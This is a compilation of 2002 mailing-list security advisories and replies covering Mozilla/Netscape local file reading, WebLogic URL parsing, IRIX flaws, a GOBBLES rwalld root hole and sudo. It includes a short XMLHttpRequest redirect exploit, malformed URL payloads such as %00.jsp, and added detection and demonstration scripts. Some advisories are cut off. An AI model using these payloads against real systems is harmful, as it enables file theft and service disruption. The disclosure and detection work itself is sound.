eSecurityOnline Security Advisories notes
Hello,

To help clear up any confusion about the Discovery Dates associated with the group of advisories that we are publishing today, I should explain the situation.

We are publishing our advisories in groups after each group is approved internally. With the exception of the Microsoft issues, none of the vulnerabilities have been posted or discussed in public forums or lists. The discovery date that we list in the advisories refers to the date on which we discovered the advisory, rather than the date that we made the information public.

Since none of these vulnerabilities (except for the Solaris CACHEFSD) have been actively exploited / seen in the wild, we have been patient in working with and waiting for vendors to complete vulnerability validation, and for patches to be developed and posted to vendor sites.

We plan to publish more advisories in the near future, and hopefully in a much more timely fashion.

Regards,
Ken Williams
eSecurityOnline Research and Development Team

Ken Williams ; CISSP ; Technical Lead ; [EMAIL PROTECTED]
eSecurityOnline - an eSecurity Venture of Ernst & Young
[EMAIL PROTECTED] ; www.esecurityonline.com ; 1-877-eSecurity
Reading local files in Netscape 6 and Mozilla (GM#001-NS)
GreyMagic Security Advisory GM#001-NS
By GreyMagic Software, Israel.
30 Apr 2002.
Available in HTML format at http://security.greymagic.com/adv/gm001-ns/.

Topic: Reading local files in Netscape 6 and Mozilla.

Discovery date: 30 Mar 2002.

Affected applications:
* All tested versions of Mozilla (0.9.7+) on Windows, other versions/platforms are believed to be vulnerable.
* All tested versions of Netscape (6.1+) on Windows, other versions/platforms are believed to be vulnerable.

Important notes:
Netscape was contacted on 24 Apr 2002 through a form on their web site and through email to [EMAIL PROTECTED] and [EMAIL PROTECTED]. They did not bother to respond AT ALL, and we think we know why.

A while ago Netscape started a Bug Bounty program, which entitles researchers who find a bug that allows an attacker to run unsafe code or access files to a $1000 reward. By completely disregarding our post Netscape has earned themselves a $1000 and lost any credibility they might have had. The money is irrelevant, but using such a con to attract researchers into disclosing bugs to Netscape is extremely unprofessional.

Netscape's faulty conducts made us rethink our disclosure guidelines and we came to the following decisions:
* Release all future Netscape advisories without notifying Netscape at all.
* Advise the security community to do the same. Netscape is deceiving researchers and should not be rewarded.
* Advise customers to stop using Netscape Navigator through our security advisories and business contacts.

[1] http://home.netscape.com/security/bugbounty.html

Introduction:
XMLHTTP is a component that is primarily used for retrieving XML documents from a web server.

On 15 Dec 2001 Jelmer published an advisory titled "MSIE6 can read local files" [1], which demonstrated how Microsoft's XMLHTTP component allows reading of local files by blindly following server-side redirections (patched by MS02-008 [2]).

[1] http://www.xs4all.nl/~jkuperus/bug.htm
[2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp

Discussion:
Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to the exact same attack.

By directing the open method to a web page that will redirect to a local/remote file it is possible to fool Mozilla into thinking it's still in the allowed zone, therefore allowing us to read it. It is then possible to inspect the content by using the responseText property.

Exploit:
This example attempts to read c:/test.txt; getFile.asp internally redirects to file://c:/test.txt:

  var oXML = new XMLHttpRequest();
  oXML.open("GET", "getFile.asp", false);
  oXML.send(null);
  alert(oXML.responseText);

Solution:
Users of Netscape Navigator should move to a better performing, less buggy browser.

Tested on:
Mozilla 0.9.7, NT4.
Mozilla 0.9.9, NT4.
Mozilla 0.9.9, Win2000.
Netscape 6.1, NT4.
Netscape 6.2.1, Win2000.
Netscape 6.2.2, NT4.
Netscape 6.2.2, Win2000.

Demonstration:
A fully dynamic proof-of-concept demonstration of this issue is available at http://security.greymagic.com/adv/gm001-ns/.

Feedback:
Please mail any questions or comments to [EMAIL PROTECTED]

- Copyright © 2002 GreyMagic Software.
Re: QPopper 4.0.4 buffer overflow
Affected versions 4.0.3 and 4.0.4, default install. Servers not processing the user's configuration file (~/.qpopper-options) are insensible to this bug.

Our testing has shown that you must use the -u parameter to be susceptible to this vulnerability. If you don't use the -u parameter for qpopper this file is not accessed. You can use the -d parameter to view the debug output to verify this.

Mike
UNIX Systems Administrator at Wake Forest University.

==
J. Mike Rollins          [EMAIL PROTECTED]
Wake Forest University   http://www.wfu.edu/~rollins
Winston-Salem, NC        work: (336) 758-1938
==
KPMG-2002016: Bea Weblogic incorrect URL parsing issues
Title: Bea Weblogic incorrect URL parsing issues
BUG-ID: 2002016
Released: 30th Apr 2002

Problem:
The Bea Weblogic server incorrectly parses certain types of URL requests. This can result in the physical path being revealed, a Denial of Service situation and revealing of .jsp sourcecode.

Vulnerable:
- Bea Weblogic V6.1 Service Pack 2 on Windows 2000 Server
- Other versions were not tested.

Details:
A problem with the URL parser in Bea Weblogic could allow a malicious user to reveal the physical path to the web root, cause a Denial of Service and reveal the sourcecode of .jsp files.

Physical webroot)
By appending %00.jsp to a normal .html request, a compiler error would in some cases be generated that would print out the path to the physical web root. A similar result can be achieved by prefixing with %5c (backslash):

Denial of Service)
This issue is very similar to the one reported in KPMG-2002003, in which we published that requesting a DOS device and appending .jsp to the request would exhaust the working threads and cause the web service to stop parsing HTTP and HTTPS requests. If a malicious user also added %00 in the request, it would still work. The server can handle about 10-11 working threads, so when this number of active threads has been reached, the server will no longer service any requests. Since both HTTP and HTTPS are handled by the same module, both are crippled if one is attacked.

Sourcecode revealed)
There are a number of ways to manipulate the URL in a way that will allow a malicious user to read the contents of a .jsp file. One way is to append %00x to the request, another could be to add +. to the request (exclamation marks excluded).

Vendor URL:
You can visit the vendor's webpage here: http://www.bea.com

Vendor response:
The vendor was contacted about the first issue on the 6th of November, 2001 and subsequently on the 12th of March, 2002 and finally on the 22nd of March, 2002 about the remaining issues.

On the 25th of March, 2002 we received a private hotfix, which corrected the issues. On the 22nd of April, 2002 the vendor released a public bulletin. The vendor's bulletin can be seen here (note that the URL has been wrapped for readability):

http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp?
highlight=advisoriesnotifications&path=components/dev2dev/
resourcelibrary/advisoriesnotifications/
securityadvisoriesbea020303.htm

Be sure you read the vendor bulletin, as it suggests other security settings that might prevent future similar issues.

Corrective action:
The following has been copied from the vendor bulletin:

BEA WebLogic Server and Express version 6.1 standalone or as part of BEA WebLogic Enterprise 6.1 on all OS platforms
Action: Apply Service Pack 2 and then apply this patch:
ftp://ftpna.bea.com/pub/releases/security/CR069809_610sp2_v2.jar
When Service Pack 3 becomes available, you can use that jar instead of Service Pack 2 and this patch.

BEA WebLogic Server and Express version 6.0 standalone or as part of BEA WebLogic Enterprise 6.0 on all OS platforms
Action: Apply Service Pack 2 with Rolling Patch 3 and then apply this patch:
ftp://ftpna.bea.com/pub/releases/security/CR069809_60sp2rp3.jar

BEA WebLogic Server and Express version 5.1 standalone or as part of BEA WebLogic Enterprise 5.1.x on all OS platforms
Action: Apply Service Pack 11 and then apply this patch:
ftp://ftpna.bea.com/pub/releases/security/CR069809_510sp11_v2.jar
When Service Pack 12 becomes available, you can use that jar instead of Service Pack 11 and this patch.

BEA WebLogic Server and Express 4.5.2 on all OS platforms
Action: Apply Service Pack 2 and then apply this patch:
ftp://ftpna.bea.com/pub/releases/security/CR045420_wls452sp2.zip

BEA WebLogic Server and Express 4.5.1 on all OS platforms
Action: Apply Service Pack 15.

Author: Peter Gründl ([EMAIL PROTECTED])

KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information.
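An added detection example (not KPMG's or BEA's code) that scans web-server access logs for the three request shapes the advisory above describes: a %00 null byte in the path (the %00.jsp path leak and %00x source leak), an encoded backslash prefix (%5c), and a DOS device name with .jsp appended (the thread-exhaustion case from KPMG-2002003). The log lines are constructed for the example and assumed to be in Common Log Format.

```python
"""Flag WebLogic access-log requests matching the malformed-URL shapes in KPMG-2002016.

Added illustration, not KPMG's or BEA's code. SAMPLE_LOG is constructed; the
Common Log Format layout is an assumption about how the server logs requests.
"""
import re
from urllib.parse import unquote

# Reserved DOS device names. Requesting one with .jsp appended is the
# working-thread exhaustion case the advisory cross-references (KPMG-2002003).
DOS_DEVICES = re.compile(
    r"(?:^|/)(?:con|prn|aux|nul|com[1-9]|lpt[1-9])(?:\.[^/]*)?$", re.IGNORECASE
)

# host ident user [timestamp] "METHOD target PROTO" status ...
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_request(target):
    """Return the advisory categories a raw request-target matches (empty if clean)."""
    hits = []
    path = target.split("?", 1)[0]
    lowered = path.lower()
    # %00 (NUL) truncation: "%00.jsp" leaks the physical path via a compiler
    # error, "%00x" exposes .jsp source. A %00 in a URL path is never legitimate.
    if "%00" in lowered:
        hits.append("null-byte")
    # %5c is an encoded backslash; the advisory reports path disclosure when a
    # request is prefixed with it.
    if "%5c" in lowered:
        hits.append("encoded-backslash")
    # Decode once (and drop any NUL) so encoded spellings of a device name such
    # as "%43ON.jsp" are still recognised.
    decoded = unquote(path).replace("\x00", "")
    if DOS_DEVICES.search(decoded):
        hits.append("dos-device")
    return hits


def scan_log(lines):
    """Yield (client_host, request_target, categories) for each suspicious line."""
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        cats = classify_request(m["target"])
        if cats:
            yield m["host"], m["target"], cats


# Constructed sample: one benign client (10.0.0.5, 10.0.0.7) and one probing client.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Apr/2002:10:01:12 +0200] "GET /index.html HTTP/1.0" 200 1532
10.0.0.9 - - [30/Apr/2002:10:01:40 +0200] "GET /index.html%00.jsp HTTP/1.0" 500 812
10.0.0.9 - - [30/Apr/2002:10:02:03 +0200] "GET /%5cindex.html HTTP/1.0" 500 790
10.0.0.9 - - [30/Apr/2002:10:02:31 +0200] "GET /con.jsp HTTP/1.0" 200 0
10.0.0.9 - - [30/Apr/2002:10:03:05 +0200] "GET /login.jsp%00x HTTP/1.0" 200 4410
10.0.0.7 - - [30/Apr/2002:10:03:44 +0200] "GET /docs/console.html HTTP/1.0" 200 3300
"""

if __name__ == "__main__":
    for host, target, cats in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{host} {target} -> {', '.join(cats)}")
```

Note that /docs/console.html is not flagged: the device-name check requires the name to be a whole path component, so "console" does not match "con".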
Re: Slrnpull Buffer Overflow (-d parameter)
Alex Hernandez ([EMAIL PROTECTED]) said:
> Linux RH.6.2 Sparc64 and below versions.

On Red Hat Linux 6.2 for sparc:

# ls -l /usr/bin/slrnpull
-rwxr-s---    1 news     news        48688 Feb  7  2000 /usr/bin/slrnpull
# rpm -q slrn-pull
slrn-pull-0.9.6.2-4

With all updates applied:

# ls -l /usr/bin/slrnpull
-rwxr-s---    1 root     news        55456 Mar  1  2001 /usr/bin/slrnpull
# rpm -q slrn-pull
slrn-pull-0.9.6.4-0.6

Hence, while you may be able to get group news, the program is only runnable by group news. So, I don't think there are any security implications here.

Bill
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
Disturbing. Netscape sure must be in financial problems since they are selling out on their users' security for a lousy $1000. I know for one that I personally will release any future Netscape advisories with full public disclosure and without prior Netscape notification.

As a matter of fact, why not start now?

The IRC:// protocol inhibited by Mozilla/NS6 seems to have a buffer overrun. A typical IRC URL could look like this:

IRC://IRC.YOUR.TLD/#YOURCHANNEL

The #YOURCHANNEL part is copied to a buffer that has a limit of 32K. If the input exceeds this limit, Mozilla 1.0 RC1 crashes with the following error:

The exception unknown software exception (0xc0fd) occured in the application at location 0x60e42edf

Mozilla 0.9.9 gives a similar exception:

The exception unknown software exception (0xc0fd) occured in the application at location 0x60dd2c79.

Other versions of Mozilla/NS6/Galeon likely share the same flaw. I haven't tested further on how practically exploitable this is.

Short example online at http://jscript.dk/2002/4/moz1rc1tests/ircbufferoverrun.html

Furthermore, Mozilla/Galeon/NS6 is prone to a local file detection vulnerability. When embedding a stylesheet with the LINK element, access to CSS files from other protocols is prohibited by the security manager. A simple HTTP redirect circumvents this security restriction and it becomes possible to use local or remote files of any type, with the side effect that you can detect if specific local files exist.

http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp

Regards
Thor Larholm
Jubii A/S - Internet Programmer

-----Original Message-----
From: GreyMagic Software [mailto:[EMAIL PROTECTED]]
Sent: 30. april 2002 03:11
To: NTBugtraq; Bugtraq
Subject: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
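Both the GreyMagic XMLHttpRequest advisory and the LINK-stylesheet variant above come down to one flaw: the browser's security manager checks the URL it was asked to load, but not the URL a server redirect sends it to. The toy fetcher below is an added illustration (not GreyMagic's, Thor Larholm's or Mozilla's code) that models the check-once behaviour beside the corrected re-check-every-hop behaviour; the redirect table, host name and file contents are constructed.

```python
"""Model of the redirect-following bug behind GM#001-NS and the LINK/CSS variant.

Added illustration, not code from the advisories or from Mozilla. RESOURCES is
a constructed map of what each URL "serves"; attacker.example is a made-up host.
"""
from urllib.parse import urlsplit

# Constructed: ("redirect", target) means the server answers with a redirect,
# ("body", text) means it serves content. file:// entries stand for local files.
RESOURCES = {
    "http://attacker.example/getFile.asp": ("redirect", "file:///c:/test.txt"),
    "http://attacker.example/style.asp": ("redirect", "file:///c:/boot.ini"),
    "http://attacker.example/page.html": ("body", "<html>hi</html>"),
    "file:///c:/test.txt": ("body", "secret local data"),
    "file:///c:/boot.ini": ("body", "[boot loader]"),
}


class SecurityError(Exception):
    """Raised when the policy forbids a document from loading a URL."""


def check_policy(document_url, target_url):
    """Policy a browser applies before a document may load a subresource:
    no file:// from a non-file document, and no cross-origin reads."""
    d, t = urlsplit(document_url), urlsplit(target_url)
    if t.scheme == "file" and d.scheme != "file":
        raise SecurityError(f"{document_url} may not read {target_url}")
    if (d.scheme, d.netloc) != (t.scheme, t.netloc):
        raise SecurityError(f"cross-origin read of {target_url} blocked")


def fetch_vulnerable(document_url, url, max_hops=5):
    """Checks policy on the initial URL only, then follows redirects blindly.
    This is the behaviour the advisories describe."""
    check_policy(document_url, url)
    for _ in range(max_hops):
        kind, value = RESOURCES[url]
        if kind == "body":
            return value
        url = value  # redirect target is never re-checked
    raise RuntimeError("too many redirects")


def fetch_hardened(document_url, url, max_hops=5):
    """Re-applies policy to every hop, so a redirect cannot escape the origin."""
    for _ in range(max_hops):
        check_policy(document_url, url)
        kind, value = RESOURCES[url]
        if kind == "body":
            return value
        url = value
    raise RuntimeError("too many redirects")


def loads_via_redirect(fetch, document_url, url):
    """The LINK-stylesheet variant: the page learns only whether the load succeeded,
    which is enough to tell whether a given local file exists."""
    try:
        fetch(document_url, url)
        return True
    except (SecurityError, KeyError):
        return False


if __name__ == "__main__":
    doc = "http://attacker.example/index.html"
    print("vulnerable:", fetch_vulnerable(doc, "http://attacker.example/getFile.asp"))
    print("hardened  :", loads_via_redirect(fetch_hardened, doc,
                                            "http://attacker.example/getFile.asp"))
```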
IRIX cpr vulnerability
-----BEGIN PGP SIGNED MESSAGE-----

                          SGI Security Advisory

        Title:      IRIX cpr vulnerability
        Number:     20020409-01-I
        Date:       April 30, 2002
        Reference:  CAN-2002-0173

--- Issue Specifics ---

It's been reported that there is a potential buffer overflow vulnerability in the /usr/sbin/cpr program. If successfully exploited, this can lead to a root compromise.

SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. These issues have been corrected in IRIX 6.5.11 and later versions.

--- Impact ---

The cpr binary is installed by default on IRIX 6.5 systems as part of eoe.sw.cpr (the SGI Checkpoint-Restart Software).

To see if cpr is installed, execute the following command:

  $ versions eoe.sw.cpr
  I = Installed, R = Removed

     Name                 Date        Description

  I  eoe                  09/19/2000  IRIX Execution Environment, 6.5.10f
  I  eoe.sw               09/19/2000  IRIX Execution Environment Software
  I  eoe.sw.cpr           09/19/2000  SGI Checkpoint-Restart Software

If the command returns output similar to the above, then cpr is installed.

This vulnerability may not be exploited by a remote user, a local account is required.

This vulnerability has been fixed in IRIX 6.5.11.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0173

--- Temporary Workaround ---

If you don't use the Checkpoint Restart software, it can be uninstalled using the command:

  # versions remove eoe.sw.cpr

If you use the software, then SGI recommends upgrading to IRIX 6.5.11 or later.

--- Solution ---

SGI has not provided patches for this vulnerability. Our recommendation is to upgrade to IRIX 6.5.11 or later.

   OS Version     Vulnerable?     Patch #      Other Actions
   ----------     -----------     -------      -------------
   IRIX 3.x       unknown                      Note 1
   IRIX 4.x       unknown                      Note 1
   IRIX 5.x       unknown                      Note 1
   IRIX 6.0.x     unknown                      Note 1
   IRIX 6.1       unknown                      Note 1
   IRIX 6.2       unknown                      Note 1
   IRIX 6.3       unknown                      Note 1
   IRIX 6.4       unknown                      Note 1
   IRIX 6.5       yes                          Notes 2 & 3
   IRIX 6.5.1     yes                          Notes 2 & 3
   IRIX 6.5.2     yes                          Notes 2 & 3
   IRIX 6.5.3     yes                          Notes 2 & 3
   IRIX 6.5.4     yes                          Notes 2 & 3
   IRIX 6.5.5     yes                          Notes 2 & 3
   IRIX 6.5.6     yes                          Notes 2 & 3
   IRIX 6.5.7     yes                          Notes 2 & 3
   IRIX 6.5.8     yes                          Notes 2 & 3
   IRIX 6.5.9     yes                          Notes 2 & 3
   IRIX 6.5.10    yes                          Notes 2 & 3
   IRIX 6.5.11    no
   IRIX 6.5.12    no
   IRIX 6.5.13    no
   IRIX 6.5.14    no
   IRIX 6.5.15    no
   IRIX 6.5.16    no

NOTES

  1) This version of the IRIX operating system has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information.

  2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

  3) Upgrade to IRIX 6.5.11 or a later version of IRIX.

--- Acknowledgments ---

SGI wishes to thank TESO Security, FIRST and the users of the Internet Community at large for their assistance in this matter.

--- Links ---

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/patches/

SGI patches for IRIX can be found at the following patch servers:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/

SGI freeware updates for IRIX can be found at:
http://freeware.sgi.com/

SGI fixes for SGI open sourced code can be found on:
http://oss.sgi.com/projects/

SGI patches and RPMs for Linux can be found at:
http://support.sgi.com/linux/ or
IRIX /dev/ipfilter Denial of Service vulnerability
-----BEGIN PGP SIGNED MESSAGE-----

                          SGI Security Advisory

        Title:      /dev/ipfilter Denial of Service vulnerability
        Number:     20020408-01-I
        Date:       April 30, 2002
        Reference:  CAN-2002-0172

--- Issue Specifics ---

SGI has determined that the default permissions on /dev/ipfilter as created by /dev/MAKEDEV could lead to a Denial of Service attack. The default permissions were 644, and while the permissions are set to that value it is possible for a non-root user to disrupt network traffic.

SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems.

--- Impact ---

The /dev/ipfilter device is created by default on IRIX 6.5 systems during installation. The ipfilterd software that is intended to use this device is not installed by default, it is part of the eoe.sw.ipgate package.

To determine if you are vulnerable, execute the following command:

  $ ls -l /dev/ipfilter
  crw-r--r--    1 root     sys       59,  0 Apr 12 08:33 /dev/ipfilter

If your /dev/ipfilter shows the permissions and ownership of 644 as in the example above, then you are vulnerable.

These vulnerabilities may not be exploited by a remote user, a local account is required.

This issue has been corrected in IRIX 6.5.11 and later versions.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0172

--- Temporary Workaround ---

You can fix the permissions of /dev/ipfilter with the following command:

  # chmod 600 /dev/ipfilter

After running that command, it should look like this:

  # ls -l /dev/ipfilter
  crw-------    1 root     sys       59,  0 Apr 12 08:33 /dev/ipfilter

However, SGI recommends upgrading to IRIX 6.5.11 or later because if the /dev/MAKEDEV script is run it will reset the permissions to 644. The /dev/MAKEDEV script has been changed in IRIX 6.5.11 to create the device with 600 permissions.

--- Solution ---

SGI has not provided patches for this vulnerability. Our recommendation is to upgrade to IRIX 6.5.11 or later.

   OS Version     Vulnerable?     Patch #      Other Actions
   ----------     -----------     -------      -------------
   IRIX 3.x       unknown                      Note 1
   IRIX 4.x       unknown                      Note 1
   IRIX 5.x       unknown                      Note 1
   IRIX 6.0.x     unknown                      Note 1
   IRIX 6.1       unknown                      Note 1
   IRIX 6.2       unknown                      Note 1
   IRIX 6.3       unknown                      Note 1
   IRIX 6.4       unknown                      Note 1
   IRIX 6.5       yes                          Notes 2 & 3
   IRIX 6.5.1     yes                          Notes 2 & 3
   IRIX 6.5.2     yes                          Notes 2 & 3
   IRIX 6.5.3     yes                          Notes 2 & 3
   IRIX 6.5.4     yes                          Notes 2 & 3
   IRIX 6.5.5     yes                          Notes 2 & 3
   IRIX 6.5.6     yes                          Notes 2 & 3
   IRIX 6.5.7     yes                          Notes 2 & 3
   IRIX 6.5.8     yes                          Notes 2 & 3
   IRIX 6.5.9     yes                          Notes 2 & 3
   IRIX 6.5.10    yes                          Notes 2 & 3
   IRIX 6.5.11    no
   IRIX 6.5.12    no
   IRIX 6.5.13    no
   IRIX 6.5.14    no
   IRIX 6.5.15    no
   IRIX 6.5.16    no

NOTES

  1) This version of the IRIX operating system has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information.

  2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

  3) Upgrade to IRIX 6.5.11 or later.

--- Links ---

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/patches/

SGI patches for IRIX can be found at the following patch servers:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/

SGI freeware updates for IRIX can be found at:
http://freeware.sgi.com/

SGI fixes for SGI open sourced code can be found on:
http://oss.sgi.com/projects/

SGI patches and RPMs for Linux can be found at:
http://support.sgi.com/linux/ or
IRIX pmcd Denial of Service vulnerability
-----BEGIN PGP SIGNED MESSAGE-----

                          SGI Security Advisory

        Title:      pmcd Denial of Service vulnerability
        Number:     20020407-01-I
        Date:       April 30, 2002
        Reference:  CAN-2000-1193

--- Issue Specifics ---

It's been reported that it is possible to feed certain parameters to the /usr/etc/pmcd daemon that will make it grow in size to the point where a Denial of Service attack can be created.

SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. These issues have been corrected in IRIX 6.5.11 and later versions.

--- Impact ---

The pmcd daemon is part of SGI's Performance Co-Pilot suite of performance monitoring tools. This is an optional product and is not installed by default, but is supplied with the base OS.

To see if pmcd is installed, execute the following command:

  % versions pcp_eoe
  I = Installed, R = Removed

     Name                   Date        Description

  I  pcp_eoe                01/22/2002  Performance Co-Pilot Execution Only Environment, 6.5.15f
  I  pcp_eoe.man            01/22/2002  PCP EOE Documentation, 6.5.15f
  I  pcp_eoe.man.relnotes   01/22/2002  PCP EOE Release Notes, 6.5.15f
  I  pcp_eoe.sw             01/22/2002  PCP EOE Software, 6.5.15f
  I  pcp_eoe.sw.eoe         01/22/2002  PCP EOE, 6.5.15f

If the output looks similar to the above, then Performance Co-Pilot is installed, and you are vulnerable if the version shown is earlier than 6.5.11.

This vulnerability may be exploited by a remote user, no local account is required.

This vulnerability has been fixed in IRIX 6.5.11 and later versions.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1193
http://www.iss.net/security_center/static/4284.php

--- Temporary Workaround ---

If you don't use the Performance Co-Pilot software, it can be uninstalled using the command:

  # versions remove pcp_eoe

If you use the software, then SGI recommends upgrading to IRIX 6.5.11 or a later version.

--- Solution ---

SGI has not provided patches for this vulnerability. Our recommendation is to upgrade to IRIX 6.5.11 or a later version.

   OS Version     Vulnerable?     Patch #      Other Actions
   ----------     -----------     -------      -------------
   IRIX 3.x       unknown                      Note 1
   IRIX 4.x       unknown                      Note 1
   IRIX 5.x       unknown                      Note 1
   IRIX 6.0.x     unknown                      Note 1
   IRIX 6.1       unknown                      Note 1
   IRIX 6.2       unknown                      Note 1
   IRIX 6.3       unknown                      Note 1
   IRIX 6.4       unknown                      Note 1
   IRIX 6.5       yes                          Notes 2 & 3
   IRIX 6.5.1     yes                          Notes 2 & 3
   IRIX 6.5.2     yes                          Notes 2 & 3
   IRIX 6.5.3     yes                          Notes 2 & 3
   IRIX 6.5.4     yes                          Notes 2 & 3
   IRIX 6.5.5     yes                          Notes 2 & 3
   IRIX 6.5.6     yes                          Notes 2 & 3
   IRIX 6.5.7     yes                          Notes 2 & 3
   IRIX 6.5.8     yes                          Notes 2 & 3
   IRIX 6.5.9     yes                          Notes 2 & 3
   IRIX 6.5.10    yes                          Notes 2 & 3
   IRIX 6.5.11    no
   IRIX 6.5.12    no
   IRIX 6.5.13    no
   IRIX 6.5.14    no
   IRIX 6.5.15    no
   IRIX 6.5.16    no

NOTES

  1) This version of the IRIX operating system has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information.

  2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

  3) Upgrade to IRIX 6.5.11 or a later version of IRIX.

--- Acknowledgments ---

SGI wishes to thank Marcelo Magnasco, ISS, FIRST and the users of the Internet Community at large for their assistance in this matter.

--- Links ---

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
Advisory + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

GOBBLES SECURITY ADVISORY #32

ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!

Forward:

  <@route> so was fydor trying to make his code unreadable when he write nmap?
  <@route> or was that just the fallout of poor planning?
  <@route> this is awful
  <@route> if ( !victim || !sport || !dport || sd < 0) {
  <@route>   fprintf(stderr, "send_udp_raw: One or more of your parameters suck!\n");
  <@route>   free(packet);
  <@route>   return -1;
  <@route> }
  <@route> This is the program that is used everywhere and written up in countless books?
  <@route> it's pretty much obscene that this program doesnt use libnet

Systems Affected: Sun Solaris 6, Sun Solaris 7, Sun Solaris 8 (sparc and x86 versions)

Threat Level: Super duper high.

Vendor Notification Status:
Initial advisory sent to Sun Microsystems on Friday, April 5th. After long series of email exchange, Sun.com engineers finally begin working on developing patch for bug. Days later, CERT contact GOBBLES about bug. Dialogue happen then too with CERT. Both Sun Microsystems and CERT have promised to make sure that GOBBLES name is in both official advisories released. Hey, we do this for fame and attention, now that we are no longer weaned we must do something! Some time, full disclosure is real pain in ass. Everyone want more and more time to get things fixed before advisory is released. Time to grace lists with more GOBBLES Advisory.

Exploit:
A proof-of-concept exploit for this vulnerability has been attached to the bottom of this email. GOBBLES wrote it in way to keep unskilled from using it, like security assessment team from Vigilante who not able to tell if vulnerability is real or not in opensourced product after reading advisory. At the same time, skilled penetrators should not have any trouble using the code provided to exploit systems in the wild. Don't send GOBBLES email asking for other versions of exploit. Some things better left private and given to close friends for their own motivations. If you can't figure out how to work with this exploit and get remote root from what is provided in the advisory, really there is no reason for you to be using an exploit.

A Few Words:
There are some thing that GOBBLES have to say, some thing very heartfelt that he need to communicate to the world, some thing that best said in song, please take time to read lyric and understand what GOBBLES trying to say. . .

  the sun has blessed the rays are gone and all the kids have left their tears and gone home, sweet 17, sour 29 and i can't explain myself what i'd hoped to find you were all so kind when i was near, and if you're still feeling down then maybe you need me around to love and hold you don't say i hadn't told you so maybe you need me around, i had no luck i had no shame i had no cause just seventeen days of rain and you in my eyes, just one more song to slay this earth and i can't explain myself just what it's worth what was all i had but not all i'd need and i can't escape the fact that i still bleed, and if you're still feeling down and if this seems way too loud then maybe you need me around, i had no voice i had no drive i had no choice i've done my time had myself had my band i had my love had no hand in watching it all fall apart and if you're still feeling down then maybe you need me around to lift and scold you to send you crashing all right now maybe you need me around.

  - Blissed and Gone, the Smashing Pumpkins

Description of Problem (Part One):
One of the default RPC services in Sun Solaris versions 6-8 has an insecure syslog() statement, which allow remote attacker to execute custom code as root. Hehe, GOBBLES bet you getting pissed because in all this length of advisory, still no mention of what is vulnerable, hehehe, ;. Keep control of temper, and keep reading, because you about to find out, hehehe GOBBLES is silly today.

Remotely Exploitable: Yes.
Locally Exploitable: Yes.
Privilege Attained After Exploitation: Root.
Exploit Included: As GOBBLES did mention previously, yes. It get you root. Girls will be impressed with mailing list reading skills and source code leeching technique utilized to gain remote root to Solaris machines. Included exploit for Sparc.

Name of Vulnerable Service:

  $ grep rwall /etc/inetd.conf
  # The rwall server allows others to post messages to users on this machine.
  walld/1         tli     rpc/datagram_v  wait    root    /usr/lib/netsvc/rwall/rpc.rwalld        rpc.rwalld

It rwalld that vulnerable. It run as root. Attacker get root from exploiting it.

Description of Problem (Part Two):
Inside rwall_subr.c we see:

        /*
         * Make sure the wall programs exists, is executeable, and runs
         */
        if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
            (fp = popen(WALL_PROG, "w")) == NULL) {
                syslog(LOG_NOTICE, "rwall message received but could not
SuSE Security Announcement: sudo (SuSE-SA:2002:014)
-----BEGIN PGP SIGNED MESSAGE-----

                        SuSE Security Announcement

        Package:                sudo
        Announcement-ID:        SuSE-SA:2002:014
        Date:                   Tue Apr 30 16:00:00 MEST 2002
        Affected products:      6.4, 7.0, 7.1, 7.2, 7.3, 8.0,
                                SuSE Firewall Adminhost VPN,
                                SuSE Linux Admin-CD for Firewall,
                                SuSE Linux Enterprise Server,
